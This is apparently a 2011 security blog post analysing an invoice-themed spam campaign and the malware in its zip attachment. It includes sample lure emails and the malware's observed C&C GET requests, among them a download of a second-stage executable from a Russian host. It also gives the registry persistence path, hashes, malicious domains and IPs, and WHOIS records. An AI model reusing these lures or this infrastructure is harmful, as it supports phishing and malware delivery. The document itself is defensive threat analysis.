Wednesday, August 10, 2011

Inter-company Invoice spam leads to Malware

This morning we are seeing a new spam campaign in the UAB Spam Data Mine. Volumes are still low, but the count is rising steadily, and the detection so far is horrible. When I started writing this post we had seen 710 copies. It's now up to 1389 copies and counting!

count | mbox
-------+---------------------
1 | 2011-08-10 05:45:00
6 | 2011-08-10 06:00:00
3 | 2011-08-10 06:15:00
85 | 2011-08-10 06:30:00
1 | 2011-08-10 06:45:00
3 | 2011-08-10 07:00:00
1 | 2011-08-10 07:15:00
301 | 2011-08-10 07:30:00
252 | 2011-08-10 07:45:00
260 | 2011-08-10 08:00:00
247 | 2011-08-10 08:15:00
229 | 2011-08-10 08:30:00
(12 rows)


The spam pretends to be an invoice from a random company. So far this morning we've seen spam claiming to be an invoice from:

Aleris International Corp.
AMR Corporation Corp.
Anic Corp.
Arch Coal Corp.
ATFT Corp
Beazer Homes USA Corp.
Boyd Gaming Corp.
Brookdale Senior Living Corp.
Hyland Software Corp.
KPMG Corp.
Kraft Foods Corp.
Miltek Corp.
Novellus Systems Corp.
OSN Corp.
PDC Corp.
Safeco Corporation Corp.
WLC Corp.

Subject can be:

Re: Fw: Inter-company inv. from (company)
Re: Fw: Inter-company inv. from (company)
Re: Fw: Inter-company invoice from (company)
Re: Fw: Intercompany invoice from (company)
Re: Fw: Corp. invoice from (company)

A couple example emails follow:



Hi
Attached the inter-company inv. for the period January 2010 til December 2010.

Thanks a lot for support setting up this process.

CHERYL Flowers
Kraft Foods Corp.



Hi

Attached the inter-company inv. for the period January 2010 til December 2010.
Thanks a lot

Asher GIFFORD
Anic Corp.



Good day


Attached the intercompany invoice for the period January 2010 til December 2010.

Thanks a lot for supporting this process
MAYOLA LEARY
Aleris International Corp.




The attachment may be named "Intinvoice" or "Invoice" followed by an underscore, a date, and an "invoice number" ".zip" such as:

Intinvoice_08.6.2011_2222341965.zip
or
Intinvoice_08.4.2011_Q167829.zip
or
Invoice_08.6.2011_T40099.zip


We've seen 1300+ copies so far in the UAB Spam Data Mine, and I have 15 in my personal email.

So far, all have had the same attachment MD5, which yields a 6 of 43 detection rate on this VirusTotal Report.

So far everyone is just saying it is "Suspicious" or "Generic" ... which is our invitation to infect ourselves and figure out what it does!

When we launched the malware, we made a connection to "armaturan.ru" on 94.199.48.152.

We also talked to "ss-partners.ru" on 77.120.114.100
and to "ledinit.ru" on 78.111.51.121

The connection to armaturan.ru did:

GET /forum/dl/ots.php?seller=4&hash={8FA33B0C-3F04-405B-83BD-1CD82D298FF2}

which seems to be uniquely registering our machine, and giving seller #4 credit for my infection?

From ss-partners.ru we fetched a file:

GET /dump/light.exe

which dropped an approximately 70k file onto our local machine.

Then we went back to armaturan.ru and sent another get:

GET /forum/dl/getruns.php?seller=4&hash={8FA33B0C-3F04-405B-83BD-1CD82D298FF2}&ahash=5895b2509324d6a17b2b6ea09859a485

Any bets on whether that ahash is the MD5 of the file I just downloaded?

Looks like I just reported back to the C&C that I successfully downloaded and installed malware with that MD5.

At this point I checked my registry and found that I had a new Run command for next time I restart. I'm supposed to run:

C:\Documents and Settings\Administrator\Application Data\3B1F8DC4\3B1F8DC4.EXE

Odd, I don't recall having a file named that?

Actually, we confirmed that this is the file that was downloaded as "light.exe" above. The VirusTotal report shows only 4 of 43 infection reports for this file as well. See VirusTotal Report.

Unfortunately, it disproves my MD5 theory. This is NOT the "ahash" value. This file's MD5 is f58d5cbb564069eca8806d4e48d7a714.

Launching the second file caused the machine to open an SSL tunnel to 78.111.51.121 and then sit idle.

You may recognize that as the IP address for "ledinit.ru" earlier, but it didn't make a connection by name. It went straight for the IP address. If that IP sounds familiar, it's probably because there have been many other malware campaigns tied to the network "Azerbaijan Baku Sol Ltd", but I'm sure that's just because it's a very large network.

78.111.51.100 is currently hosting three live Zeus C&C servers. Surely a coincidence.

fileuplarc.com
hunterdriveez.com
asdfasdgqghgsw.cx.cc

I'll email the owner and get those taken down right away! (smirk)

-----------

person: Vugar Kouliyev
address: 44, J.Jabbarli str., Baku, Azerbaijan
mnt-by: MNT-SOL
e-mail: vugar@kouliyev.com
phone: +994124971234
nic-hdl: VK1161-RIPE
source: RIPE # Filtered

route: 78.111.48.0/20
descr: SOL ISP
origin: AS43637
mnt-by: MNT-SOL
source: RIPE # Filtered

route: 78.111.51.0/24
descr: SOL ISP
origin: AS43637
mnt-by: MNT-SOL
source: RIPE # Filtered

----------------

Armaturan.ru on 94.199.48.152 also has a sordid history.

That IP address, in Hungary, has been associated with at least two active SpyEye domains: hdkajhslalskjd.ru and hhasdalkjjfasd.ru

I suppose we'll have to ask Mr. Zsolt nicely if he would remove those domains.

person: Zemancsik Zsolt
address: Victor Hugo u. 18-22.
address: 1132 Budapest
address: Hungary
phone: +36 203609059
e-mail: darwick@cyberground.hu
nic-hdl: DARW-RIPE
mnt-by: DARW-MNT
source: RIPE # Filtered

route: 94.199.48.0/21
descr: Originated from 23VNet Network
origin: AS30836
mnt-by: NET23-MNT
source: RIPE # Filtered

========
ss-partners.ru is on servers from Bellhost.ru, a customer of Volia DC

person: Volia DC Admin contact
address: Ukraine, Kiev, Kikvidze st. 1/2
phone: +38 044 2852716
abuse-mailbox: abuse@dc.volia.com
nic-hdl: VDCA-RIPE
mnt-by: VOLIA-DC-MNT
source: RIPE # Filtered

route: 77.120.96.0/19
descr: Volia more specific route
origin: AS25229
mnt-by: VOLIA-MNT
mnt-lower: VOLIA-MNT
source: RIPE # Filtered


No comments:

Post a Comment

Trying a new setting. After turning on comments, I got about 20-30 comments per day that were all link spam. Sorry to require login, but the spam was too much.